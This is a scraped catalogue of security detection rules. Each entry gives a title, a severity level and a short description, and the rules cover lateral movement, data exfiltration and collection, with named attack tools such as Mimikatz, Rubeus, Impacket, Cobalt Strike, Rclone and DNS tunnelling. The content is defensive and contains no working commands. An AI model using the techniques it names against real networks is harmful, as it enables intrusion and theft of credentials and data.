Remote DCOM/WMI Lateral MovementhighDetects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.
Remote Registry Lateral MovementhighDetects remote RPC calls to modify the registry and possible execute code
Remote Server Service AbusehighDetects remote RPC calls to possibly abuse remote encryption service via MS-SRVS
Remote Server Service Abuse for Lateral MovementhighDetects remote RPC calls to possibly abuse remote encryption service via MS-EFSR
Remote Schedule Task Lateral Movement via SASechighDetects remote RPC calls to create or execute a scheduled task via SASec
AWS Console GetSigninToken Potential AbusemediumDetects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.
AWS STS AssumeRole MisuselowIdentifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.
AWS STS GetSessionToken MisuselowIdentifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
AWS Suspicious SAML ActivitymediumIdentifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
Bitbucket Global SSH Settings ChangedmediumDetects Bitbucket global SSH access configuration changes.
Remote File CopylowDetects the use of tools that copy files from or to remote systems
Cisco Stage DatalowVarious protocols maybe used to put data on the device for exfil or infil
SMB Spoolss Name Piped UsagemediumDetects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
OMIGOD HTTP No Authentication RCEhighDetects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
Publicly Accessible RDP ServicehighDetects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service.
Remote Task Creation via ATSVC Named Pipe - ZeekmediumDetects remote task creation via at.exe or API interacting with ATSVC namedpipe
First Time Seen Remote Named Pipe - ZeekhighThis detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes
Suspicious PsExec Execution - Zeekhighdetects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one
Apache Threading ErrormediumDetects an issue in apache logs that reports threading related errors
Mimikatz UsehighThis method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
Audit CVE EventcriticalDetects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
NTLM LogonlowDetects logons using NTLM, which could be caused by a legacy source or attackers
OpenSSH Server Listening On SocketmediumDetects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.
Access To ADMIN$ Network SharelowDetects access to ADMIN$ network share
Remote Task Creation via ATSVC Named PipemediumDetects remote task creation via at.exe or API interacting with ATSVC namedpipe
CobaltStrike Service Installations - SecurityhighDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
DCERPC SMB Spoolss Named PipemediumDetects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
DCOM InternetExplorer.Application Iertutil DLL Hijack - SecurityhighDetects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.
External Disk Drive Or USB Storage Device Was Recognized By The SystemlowDetects external disk drives or plugged-in USB devices.
Persistence and Execution at Scale via GPO Scheduled TaskhighDetect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale
Impacket PsExec ExecutionhighDetects execution of Impacket's psexec.py.
First Time Seen Remote Named PipehighThis detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes
Metasploit SMB AuthenticationhighAlerts on Metasploit host's authentications on the domain.
Metasploit Or Impacket Service Installation Via SMB PsExechighDetects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
Denied Access To Remote DesktopmediumThis event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available windows servers in the network.
Protected Storage Service AccesshighDetects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers
RDP over Reverse SSH Tunnel WFPhighDetects svchost hosting RDP termsvcs communicating with the loopback address
Register new Logon Process by RubeushighDetects potential use of Rubeus via registered new trusted logon process
SMB Create Remote File Admin SharehighLook for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).
Suspicious Remote Logon with Explicit CredentialsmediumDetects suspicious processes logging on with explicit credentials
Uncommon Outbound Kerberos Connection - SecuritymediumDetects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
Suspicious PsExec Executionhighdetects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one
Remote Service Activity via SVCCTL Named PipemediumDetects remote service activity via remote access to the svcctl named pipe
User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'highThe 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.
T1047 Wmiprvse Wbemcomn DLL HijackhighDetects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario.
Admin User Remote LogonlowDetect remote login by Administrator user (depending on internal pattern).
RDP Login from LocalhosthighRDP login with localhost source address may be a tunnelled login
Successful Overpass the Hash AttempthighDetects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.
Scanner PoC for CVE-2019-0708 RDP RCE VulnhighDetects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep
Pass the Hash Activity 2mediumDetects the attack technique pass the hash which is used to move laterally inside the network
Outgoing Logon with New CredentialslowDetects logon events that specify new credentials
NTLMv1 Logon Between Client and ServermediumDetects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.
Zerologon Exploitation Using Well-known ToolscriticalThis rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with "kali" hostname.
CobaltStrike Service Installations - SystemcriticalDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
smbexec.py Service InstallationhighDetects the use of smbexec.py tool by detecting a specific service installation
Potential RDP Exploit CVE-2019-0708mediumDetect suspicious error on protocol RDP, potential CVE-2019-0708
PSExec and WMI Process Creations BlockhighDetects blocking of process creations originating from PSExec and WMI commands
Potential DCOM InternetExplorer.Application DLL HijackcriticalDetects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
PSEXEC Remote Execution File ArtefacthighDetects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
Wmiexec Default Output FilecriticalDetects the creation of the default output filename used by the wmiexec tool
Wmiprvse Wbemcomn DLL Hijack - FilecriticalDetects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
Writing Local Admin SharemediumAversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.
Potential DCOM InternetExplorer.Application DLL Hijack - Image LoadcriticalDetects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL LoadmediumDetects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
Wmiprvse Wbemcomn DLL HijackhighDetects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
Suspicious WSMAN Provider Image LoadsmediumDetects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
Outbound RDP Connections Over Non-Standard ToolshighDetects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
RDP Over Reverse SSH TunnelhighDetects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
RDP to HTTP or HTTPS Target PortshighDetects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
Uncommon Outbound Kerberos ConnectionmediumDetects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
Potential Remote PowerShell Session InitiatedhighDetects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicates a remote PowerShell connection.
PUA - CSExec Default Named PipemediumDetects default CSExec pipe creation
PUA - RemCom Default Named PipemediumDetects default RemCom pipe creation
Remote PowerShell Session (PS Classic)lowDetects remote PowerShell sessions
Suspicious Non PowerShell WSMAN COM ProvidermediumDetects suspicious use of the WSMAN provider without PowerShell.exe as the host application.
HackTool - Evil-WinRm Execution - PowerShell ModulehighDetects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.
Remote PowerShell Session (PS Module)highDetects remote PowerShell sessions
Enable Windows Remote ManagementmediumAdversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
HackTool - Rubeus Execution - ScriptBlockhighDetects the execution of the hacktool Rubeus using specific command line flags
Execute Invoke-command on Remote HostmediumAdversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
Suspicious New-PSDrive to Admin SharemediumAdversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
Remote LSASS Process Access Through Windows Remote ManagementhighDetects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
HackTool - WinRM Access Via Evil-WinRMmediumAdversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
HackTool - Potential Impacket Lateral Movement ActivityhighDetects wmiexec/dcomexec/atexec/smbexec from Impacket framework
HackTool - KrbRelayUp ExecutionhighDetects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
HackTool - Rubeus ExecutioncriticalDetects the execution of the hacktool Rubeus via PE information of command line parameters
HackTool - SharpMove Tool ExecutionhighDetects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.
HackTool - SharpWSUS/WSUSpendu ExecutionhighDetects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
HackTool - Wmiexec Default Powershell CommandhighDetects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
Suspicious SysAidServer ChildmediumDetects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
MMC Spawning Windows ShellhighDetects a Windows command line executable started from MMC
Potential MSTSC Shadowing ActivityhighDetects RDP session hijacking by using MSTSC shadowing
New Remote Desktop Connection Initiated Via Mstsc.EXEmediumDetects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Mstsc.EXE Execution From Uncommon ParenthighDetects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
New Port Forwarding Rule Added Via Netsh.EXEmediumDetects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
RDP Port Forwarding Rule Added Via Netsh.EXEhighDetects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
Windows Admin Share Mount Via Net.EXEmediumDetects when an admin share is mounted using net.exe
Password Provided In Command Line Of Net.EXEmediumDetects a when net.exe is called with a password in the command line
Windows Internet Hosted WebDav Share Mount Via Net.EXEhighDetects when an internet hosted webdav share is mounted using the "net.exe" utility
Windows Share Mount Via Net.EXElowDetects when a share is mounted using the "net.exe" utility
Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApphighDetects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
PDQ Deploy Remote Adminstartion Tool ExecutionmediumDetect use of PDQ Deploy remote admin tool
Suspicious Plink Port ForwardinghighDetects suspicious Plink tunnel port forwarding to a local port
PUA - Radmin Viewer Utility ExecutionmediumDetects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
Potential Tampering With RDP Related Registry Keys Via Reg.EXEhighDetects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
Rundll32 Execution Without ParametershighDetects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
Port Forwarding Activity Via SSH.EXEmediumDetects port forwarding activity via SSH.exe
User Added to Remote Desktop Users GrouphighDetects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
Copy From Or To Admin Share Or Sysvol FoldermediumDetects a copy command or a copy utility execution to or from an Admin share or remote
Privilege Escalation via Named Pipe ImpersonationhighDetects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
Potential Remote Desktop TunnelingmediumDetects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
Terminal Service Process SpawnhighDetects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
Suspicious RDP Redirect Using TSCONhighDetects a suspicious RDP session redirect using tscon.exe
Suspicious UltraVNC ExecutionhighDetects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)
Potential Persistence Via Logon Scripts - RegistrymediumDetects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
New PortProxy Registry Entry AddedmediumDetects the modification of the PortProxy registry key which is used for port forwarding.
Potential CobaltStrike Service Installations - RegistryhighDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
Turla Group Lateral MovementcriticalDetects automated lateral movement by Turla group
WannaCry Ransomware ActivitycriticalDetects WannaCry ransomware activity
APT31 Judgement Panda ActivitycriticalDetects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoChighDetects the execution of the commonly used ZeroLogon PoC executable.
Possible Exploitation of Exchange RCE CVE-2021-42321highDetects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321
Hermetic Wiper TG Process PatternshighDetects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
Potential CVE-2023-46214 Exploitation AttemptmediumDetects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing
Exploitation Attempt Of CVE-2023-46214 Using Public POC CodehighDetects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code
User with Privileges LogonlowDetects logon with "Special groups" and "Special Privileges" can be thought of as Administrator groups or privileges.
Potential Pass the Hash ActivitymediumDetects the attack technique pass the hash which is used to move laterally inside the network
Interactive Logon to Server SystemsmediumDetects interactive console logons to Server Systems
New RDP Connection Initiated From Domain ControllerhighDetects an RDP connection originating from a domain controller.
Potential Remote WMI ActiveScriptEventConsumers ActivitymediumDetect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
SMB over QUIC Via PowerShell ScriptmediumDetects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments
Net.EXE ExecutionlowDetects execution of "Net.EXE".
SMB over QUIC Via Net.EXEmediumDetects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
Mimikatz In-MemorymediumDetects certain DLL loads when Mimikatz gets executed
Automated Turla Group Lateral MovementmediumDetects automated lateral movement by Turla group
Metasploit Or Impacket Service Installation Via SMB PsExechighDetects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
Remote Schtasks CreationmediumDetects remote execution via scheduled task creation or update on the destination host
Failed Mounting of Hidden SharemediumDetects repeated failed (outgoing) attempts to mount a hidden share
attack.exfiltration 92
Show Rules (92)
Title Level Description
Microsoft Binary Github CommunicationhighDetects an executable in the Windows folder accessing github.com
Dnscat ExecutioncriticalDnscat exfiltration tool execution
Suspicious Bitstransfer via PowerShellmediumDetects transferring files from system on a server bitstransfer Powershell cmdlets
RClone ExecutionhighDetects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
Rclone Execution via Command Line or PowerShellhighDetects Rclone which is commonly used by ransomware groups for exfiltration
OpenCanary - FTP Login AttempthighDetects instances where an FTP service on an OpenCanary node has had a login attempt.
OpenCanary - TFTP RequesthighDetects instances where a TFTP service on an OpenCanary node has had a request.
Suspicious SQL QuerymediumDetects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields
AWS EC2 VM Export FailurelowAn attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.
AWS RDS Master Password ChangemediumDetects the change of database master password. It may be a part of data exfiltration.
Modification or Deletion of an AWS RDS ClusterhighDetects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information.
Restore Public AWS RDS InstancehighDetects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.
AWS S3 Data Management TamperinglowDetects when a user tampers with S3 data management in Amazon Web Services.
AWS Snapshot Backup ExfiltrationmediumDetects the modification of an EC2 snapshot's permissions to enable access from another account
Data Exfiltration to Unsanctioned AppsmediumDetects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.
Suspicious Inbox ForwardinglowDetects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.
Suspicious OAuth App File Download ActivitiesmediumDetects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.
Data CompressedlowAn adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Data Exfiltration with WgetmediumDetects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.
Split A File Into Pieces - LinuxlowDetection use of the command "split" to split files into parts and possible transfer.
Communication To Ngrok Tunneling Service - LinuxhighDetects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
Suspicious Curl File Upload - LinuxmediumDetects a suspicious curl process start the adds a file to a web request
Disk Image Creation Via Hdiutil - MacOSmediumDetects the execution of the hdiutil utility in order to create a disk image.
Split A File Into PieceslowDetection use of the command "split" to split files into parts and possible transfer.
Cisco Stage DatalowVarious protocols maybe used to put data on the device for exfil or infil
Monero Crypto Coin Mining Pool LookuphighDetects suspicious DNS queries to Monero mining pools
Suspicious DNS Query with B64 Encoded StringmediumDetects suspicious DNS queries using base64 encoding
DNS TOR ProxiesmediumIdentifies IPs performing DNS lookups associated with common Tor proxies.
WebDav Put RequestlowA General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.
Rclone Activity via ProxymediumDetects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string
Suspicious Windows Strings In URIhighDetects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication
DNS Query for Anonfiles.com Domain - DNS ClienthighDetects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes
DNS Query To MEGA Hosting Website - DNS ClientmediumDetects DNS queries for subdomains related to MEGA sharing website
DNS Query To Ufile.io - DNS ClientlowDetects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration
Tap Driver Installation - SecuritylowDetects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.
Tap Driver InstallationmediumWell-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques
DNS Query for Anonfiles.com Domain - SysmonhighDetects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes
DNS Query To MEGA Hosting WebsitemediumDetects DNS queries for subdomains related to MEGA sharing website
DNS Query To Ufile.iolowDetects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration
Rclone Config File CreationmediumDetects Rclone config files being created
Network Connection Initiated To BTunnels DomainsmediumDetects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Network Connection Initiated To Cloudflared Tunnels DomainsmediumDetects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Network Connection Initiated To DevTunnels DomainmediumDetects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Network Connection Initiated To Mega.nzlowDetects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
Process Initiated Network Connection To Ngrok DomainhighDetects an executable initiating a network connection to "ngrok" domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
Communication To Ngrok Tunneling Service InitiatedhighDetects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
Network Communication Initiated To Portmap.IO DomainmediumDetects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
Network Connection Initiated To Visual Studio Code Tunnels DomainmediumDetects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Suspicious Outbound SMTP ConnectionsmediumAdversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Potential Data Exfiltration Via Audio FilemediumDetects potential exfiltration attempt via audio file using PowerShell
Suspicious PowerShell Mailbox SMTP Forward RulemediumDetects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.
PowerShell ICMP ExfiltrationmediumDetects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
Powershell DNSExfiltrationhighDNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel
Suspicious PowerShell Mailbox Export to Share - PScriticalDetects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
PowerShell Script With File Hostname Resolving CapabilitiesmediumDetects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.
PowerShell Script With File Upload CapabilitieslowDetects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method.
Arbitrary File Download Via ConfigSecurityPolicy.EXEmediumDetects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. Users can configure different pilot collections for each of the co-management workloads. It can be abused by attackers in order to upload or download files.
Active Directory Structure Export Via Csvde.EXEmediumDetects the execution of "csvde.exe" in order to export organizational Active Directory structure.
DNS Exfiltration and Tunneling Tools ExecutionhighWell-known DNS Exfiltration tools execution
Active Directory Structure Export Via Ldifde.EXEmediumDetects the execution of "ldifde.exe" in order to export organizational Active Directory structure.
LOLBAS Data Exfiltration by DataSvcUtil.exemediumDetects when a user performs data exfiltration by using DataSvcUtil.exe
Email Exifiltration Via PowershellhighDetects email exfiltration via powershell cmdlets
Suspicious PowerShell Mailbox Export to SharecriticalDetects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
PUA - Rclone ExecutionhighDetects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
Exports Critical Registry Keys To a FilehighDetects the export of a crital Registry key to a file.
Exports Registry Key To a FilelowDetects the export of the target Registry key to a file.
Suspicious WebDav Client Execution Via Rundll32.EXEhighDetects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
WebDav Client Execution Via Rundll32.EXEmediumDetects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
Copy From Or To Admin Share Or Sysvol FoldermediumDetects a copy command or a copy utility execution to or from an Admin share or remote
Suspicious Redirection to Local Admin SharehighDetects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers
Tap Installer ExecutionmediumWell-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
Compressed File Creation Via Tar.EXElowDetects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
Compressed File Extraction Via Tar.EXElowDetects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.
APT40 Dropbox Tool User AgenthighDetects suspicious user agent string of APT40 Dropbox tool
Potential CVE-2023-23397 Exploitation Attempt - SMBmediumDetects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.
Mail Forwarding/Redirecting Activity In O365mediumDetects email forwarding or redirecting acitivty in O365 Audit logs.
Compress-Archive Cmdlet ExecutionlowDetects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Potential Data Exfiltration Over SMTP Via Send-MailMessage CmdletmediumDetects the execution of a PowerShell script with a call to the "Send-MailMessage" cmdlet along with the "-Attachments" flag. This could be a potential sign of data exfiltration via Email. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Potential Data Exfiltration Via Curl.EXEmediumDetects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration
Tunneling Tool ExecutionmediumDetects the execution of well known tools that can be abused for data exfiltration and tunneling.
AWS EC2 Download UserdatamediumDetects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.
Possible DNS TunnelinghighNormally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.
High DNS Bytes OutmediumHigh DNS queries bytes amount from host per short period of time
High NULL Records Requests RatemediumExtremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution
High DNS Requests RatemediumHigh DNS requests amount from host per short period of time
High DNS subdomain requests rate per domainhighHigh rate of unique Fully Qualified Domain Names (FQDN) requests per root domain (eTLD+1) in short period of time
High TXT Records Requests RatemediumExtremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution
Large domain name requesthighDetects large DNS domain names
High DNS Bytes Out - FirewallmediumHigh DNS queries bytes amount from host per short period of time
High DNS Requests Rate - FirewallmediumHigh DNS requests amount from host per short period of time
Tap Driver InstallationmediumWell-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques
Potential Exfiltration of Compressed FilesmediumThis rule detects potential exfiltration by looking for a few compression extensions in the uri and signs of compression in the mime type, file type, and http body
attack.collection 88
Show Rules (88)
Title Level Description
iOS Implant URL PatterncriticalDetects URL pattern used by iOS Implant
OpenCanary - GIT Clone RequesthighDetects instances where a GIT service on an OpenCanary node has had Git Clone request.
OpenCanary - MSSQL Login Attempt Via SQLAuthhighDetects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.
OpenCanary - MSSQL Login Attempt Via Windows AuthenticationhighDetects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.
OpenCanary - MySQL Login AttempthighDetects instances where a MySQL service on an OpenCanary node has had a login attempt.
OpenCanary - REDIS Action Command AttempthighDetects instances where a REDIS service on an OpenCanary node has had an action command attempted.
OpenCanary - SIP RequesthighDetects instances where an SIP service on an OpenCanary node has had a SIP request.
OpenCanary - SMB File Open RequesthighDetects instances where an SMB service on an OpenCanary node has had a file open request.
AWS EC2 VM Export FailurelowAn attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.
Bitbucket Full Data Export TriggeredhighDetects when full data export is attempted.
Bitbucket Unauthorized Full Data Export TriggeredcriticalDetects when full data export is attempted an unauthorized user.
Bitbucket User Details Export Attempt DetectedmediumDetects user data export activity.
Google Full Network Traffic Packet CapturemediumIdentifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.
Github Delete Action InvokedmediumDetects delete action in the Github audit logs for codespaces, environment, project and repo.
Github Outside Collaborator DetectedmediumDetects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.
